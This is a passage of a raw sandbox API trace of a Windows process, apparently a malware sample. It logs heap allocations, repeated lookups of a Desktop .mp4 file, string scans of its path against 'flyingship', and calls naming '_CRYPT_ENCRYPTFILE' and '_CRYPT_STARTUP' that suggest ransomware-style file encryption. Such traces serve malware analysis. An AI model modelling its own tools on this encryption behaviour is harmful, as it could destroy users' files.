RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.138] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.138] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x266210e0, ftCreationTime.dwHighDateTime=0x1d5e0d3, ftLastAccessTime.dwLowDateTime=0xcfa2aa80, ftLastAccessTime.dwHighDateTime=0x1d5dace, ftLastWriteTime.dwLowDateTime=0xcfa2aa80, ftLastWriteTime.dwHighDateTime=0x1d5dace, nFileSizeHigh=0x0, nFileSizeLow=0xf55d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="qPUo-BPNhJloiyjRuI7.mp4", cAlternateFileName="QPUO-B~1.MP4")) returned 0x90add8 [0162.140] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0162.140] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0162.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0162.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0162.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0162.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0162.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0162.140] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x266210e0, ftCreationTime.dwHighDateTime=0x1d5e0d3, ftLastAccessTime.dwLowDateTime=0xcfa2aa80, ftLastAccessTime.dwHighDateTime=0x1d5dace, ftLastWriteTime.dwLowDateTime=0xcfa2aa80, ftLastWriteTime.dwHighDateTime=0x1d5dace, nFileSizeHigh=0x0, nFileSizeLow=0xf55d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="qPUo-BPNhJloiyjRuI7.mp4", cAlternateFileName="QPUO-B~1.MP4")) returned 0x90add8 [0162.141] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0162.141] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0162.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0162.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jbH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bH3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qPUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PUo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uo-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BPNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hJloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JloiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="loiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oiyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iyjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yjRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jRuI7.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.143] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0162.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0162.144] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0162.144] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0162.144] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0162.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0162.144] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0162.144] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0162.144] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0162.144] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0162.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.145] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0162.145] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x266210e0, ftCreationTime.dwHighDateTime=0x1d5e0d3, ftLastAccessTime.dwLowDateTime=0xcfa2aa80, ftLastAccessTime.dwHighDateTime=0x1d5dace, ftLastWriteTime.dwLowDateTime=0xcfa2aa80, ftLastWriteTime.dwHighDateTime=0x1d5dace, nFileSizeHigh=0x0, nFileSizeLow=0xf55d, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="qPUo-BPNhJloiyjRuI7.mp4", cAlternateFileName="QPUO-B~1.MP4")) returned 0x90af58 [0162.145] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0162.145] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0162.145] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.145] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.145] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.145] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 